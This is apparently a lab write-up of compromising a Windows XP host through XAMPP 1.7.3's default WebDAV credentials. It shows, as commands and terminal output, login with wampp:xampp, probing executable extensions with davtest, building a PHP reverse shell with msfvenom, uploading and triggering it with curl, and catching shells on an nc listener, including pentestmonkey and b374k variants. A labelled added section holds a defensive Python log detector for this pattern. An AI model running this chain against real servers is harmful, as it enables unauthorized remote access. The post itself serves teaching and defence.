This will be a quick post. On XAMPP 1.7.3 and earlier versions, the WebDAV plugin is enabled by default, with the default credentials wampp:xampp. My target is a Windows XP (SP3) machine. I know the exploit seems really old, but it’s a great way to learn.

I’ll be using cadaver, a command-line WebDAV client for Unix, to communicate with the service. It supports file upload, move/copy, delete, and so on.

root@kali:~# cadaver http://192.168.100.26/webdav
Authentication required for XAMPP with WebDAV on server `192.168.100.26':
Username: wampp
Password: 
dav:/webdav/> 

I’m logged in. Use the help command to list the available commands:

dav:/webdav/> help
Available commands: 
 ls         cd         pwd        put        get        mget       mput       
 edit       less       mkcol      cat        delete     rmcol      copy       
 move       lock       unlock     discover   steal      showlocks  version    
 checkin    checkout   uncheckout history    label      propnames  chexec     
 propget    propdel    propset    search     set        open       close      
 echo       quit       unset      lcd        lls        lpwd       logout     
 help       describe   about      
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/webdav/> 

That’s interesting. Let’s upload a simple ‘test.txt’ file, then request that URL using curl:

dav:/webdav/> put test.txt
Uploading test.txt to `/webdav/test.txt':
Progress: [=============================>] 100.0% of 32 bytes succeeded.
dav:/webdav/> exit
Connection to `192.168.100.26' closed.
root@kali:~# 
root@kali:~# 
root@kali:~# curl http://192.168.100.26/webdav/test.txt
Test File >>> Upload == Success
root@kali:~# 

Files with a .txt extension are allowed, but not every file type will be executed or interpreted by the server. Trying every extension out there by hand would take an immense amount of time.

Another utility called davtest can do that in a matter of seconds:

root@kali:~# davtest -url http://192.168.100.26/webdav -auth wampp:xampp -cleanup
********************************************************
 Testing DAV connection
OPEN		SUCCEED:		http://192.168.100.26/webdav
********************************************************
NOTE	Random string for this session: uOtzoG8cI1__
********************************************************
 Creating directory
MKCOL		SUCCEED:		Created http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__
********************************************************
 Sending test files
PUT	shtml	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.shtml
PUT	pl	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.pl
PUT	php	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.php
PUT	jsp	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.jsp
PUT	txt	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.txt
PUT	cfm	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.cfm
PUT	asp	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.asp
PUT	cgi	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.cgi
PUT	jhtml	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.jhtml
PUT	html	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.html
PUT	aspx	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.aspx
********************************************************
 Checking for test file execution
EXEC	shtml	FAIL
EXEC	pl	FAIL
EXEC	php	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.php
EXEC	jsp	FAIL
EXEC	txt	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.txt
EXEC	cfm	FAIL
EXEC	asp	FAIL
EXEC	cgi	FAIL
EXEC	jhtml	FAIL
EXEC	html	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.html
EXEC	aspx	FAIL
********************************************************
 Cleaning up
DELETE		SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__

********************************************************
--snip--

The -cleanup flag will delete all uploaded files before exiting. Only txt, php, and html files can be executed.


PHP files are allowed and executed. I will generate a PHP reverse shell with msfvenom:

root@kali:~# msfvenom -p php/reverse_php LHOST=192.168.100.30 LPORT=12345 -f raw > revshell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 3058 bytes
root@kali:~# 

Uploading the payload:

dav:/webdav/> put revshell.php
Uploading revshell.php to `/webdav/revshell.php':
Progress: [=============================>] 100.0% of 3058 bytes succeeded.
dav:/webdav/> 

Using curl to trigger the shell:

root@kali:~# curl -s http://192.168.100.26/webdav/revshell.php

Once the connection comes back to my nc listener, typing cmd gives an interactive command prompt:

root@kali:~# nc -nlvp 12345
listening on [any] 12345 ...
connect to [192.168.100.30] from (UNKNOWN) [192.168.100.26] 1118
cmd
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\xampp\webdav>
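From the defender’s side, davtest’s -cleanup removes the test files and the uploaded shell can be deleted afterwards, but every PUT, MKCOL and DELETE against /webdav/, and the GET that triggers the script, still lands in Apache’s access log. The following script is an added example (not from the original post, nor from davtest or cadaver) that flags that pattern over constructed combined-format log lines modelled on the sessions above; the timestamps and user agents in the sample are assumed.

```python
import re

# Simplified matcher for Apache "combined" log lines: client, auth user, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Server-side extensions worth alerting on; .php is the one that executed in the davtest run above.
SCRIPT_EXTS = (".php", ".phtml", ".shtml", ".pl", ".cgi", ".asp", ".aspx", ".jsp", ".cfm")

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_script(path):
    return path.lower().endswith(SCRIPT_EXTS)

def find_webdav_abuse(lines, dav_prefix="/webdav/"):
    """Return (alert, client_ip, auth_user, path) tuples for the pattern in this post:
    an authenticated WebDAV write of a server-side script, then a GET that runs it."""
    uploaded, alerts = set(), []
    for line in lines:
        r = parse_line(line)
        if r is None or not r["path"].startswith(dav_prefix):
            continue
        if r["method"] == "PUT" and r["status"][0] == "2" and is_script(r["path"]):
            uploaded.add(r["path"])
            alerts.append(("script_upload", r["ip"], r["user"], r["path"]))
        elif r["method"] == "GET" and r["path"] in uploaded:
            alerts.append(("upload_executed", r["ip"], r["user"], r["path"]))
        # davtest names its scratch collection DavTestDir_<session string>; cleanup deletes it again.
        if "DavTestDir_" in r["path"] and r["method"] in ("MKCOL", "DELETE"):
            alerts.append(("davtest_marker", r["ip"], r["user"], r["path"]))
    return alerts

# Constructed sample log lines mirroring the sessions above (not real captured logs).
SAMPLE_LOG = """\
192.168.100.30 - wampp [10/Mar/2019:14:02:11 +0000] "PUT /webdav/test.txt HTTP/1.1" 201 0 "-" "cadaver/0.23.3"
192.168.100.30 - - [10/Mar/2019:14:02:40 +0000] "GET /webdav/test.txt HTTP/1.1" 200 32 "-" "curl/7.64.0"
192.168.100.30 - wampp [10/Mar/2019:14:05:02 +0000] "MKCOL /webdav/DavTestDir_uOtzoG8cI1__ HTTP/1.1" 201 0 "-" "davtest"
192.168.100.30 - wampp [10/Mar/2019:14:05:03 +0000] "PUT /webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.php HTTP/1.1" 201 0 "-" "davtest"
192.168.100.30 - - [10/Mar/2019:14:05:04 +0000] "GET /webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.php HTTP/1.1" 200 12 "-" "davtest"
192.168.100.30 - wampp [10/Mar/2019:14:05:09 +0000] "DELETE /webdav/DavTestDir_uOtzoG8cI1__ HTTP/1.1" 204 0 "-" "davtest"
192.168.100.30 - wampp [10/Mar/2019:14:10:00 +0000] "PUT /webdav/revshell.php HTTP/1.1" 201 0 "-" "cadaver/0.23.3"
192.168.100.30 - - [10/Mar/2019:14:10:30 +0000] "GET /webdav/revshell.php HTTP/1.1" 200 0 "-" "curl/7.64.0"
"""

if __name__ == "__main__":
    for a in find_webdav_abuse(SAMPLE_LOG.splitlines()):
        print(*a)
```

The .txt upload produces no alert, while the two script uploads each raise a script_upload followed by an upload_executed, and the davtest scratch directory is caught on both creation and cleanup.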

Second Attempt

I’ll use the PHP reverse shell that ships with Kali. It can be found here:

/usr/share/webshells/php/php-reverse-shell.php

The reverse shell is from pentestmonkey. It has only been tested on Linux, so a few tweaks need to be made:

  • $ip = '192.168.100.3'; // Input your IP
  • $port = 12345; // Input your port
  • $shell = 'cmd'; // Shell to execute

root@kali:~# cadaver http://192.168.100.26/webdav
Authentication required for XAMPP with WebDAV on server `192.168.100.26':
Username: wampp
Password: 
dav:/webdav/> put php-reverse-shell.php
Uploading php-reverse-shell.php to `/webdav/php-reverse-shell.php':
Progress: [=============================>] 100.0% of 5477 bytes succeeded.
dav:/webdav/> exit
Connection to `192.168.100.26' closed.
root@kali:~# curl http://192.168.100.26/webdav/php-reverse-shell.php

On my listener:

root@kali:~# nc -nlvp 12345
listening on [any] 12345 ...
connect to [192.168.100.30] from (UNKNOWN) [192.168.100.26] 1056
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\xampp\apache>

Now I’m in C:\xampp\apache>. But when I run commands, there’s no output. More editing is required for Windows.

Third Attempt

This time I’ll be using this reverse shell. It works:

root@kali:~/winxp/windows-php-reverse-shell# nc -nlvp 12345
listening on [any] 12345 ...
connect to [192.168.100.30] from (UNKNOWN) [192.168.100.26] 1059
b374k shell : connected

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\Temp>set u
set u
USERPROFILE=C:\Documents and Settings\LocalService

C:\WINDOWS\Temp>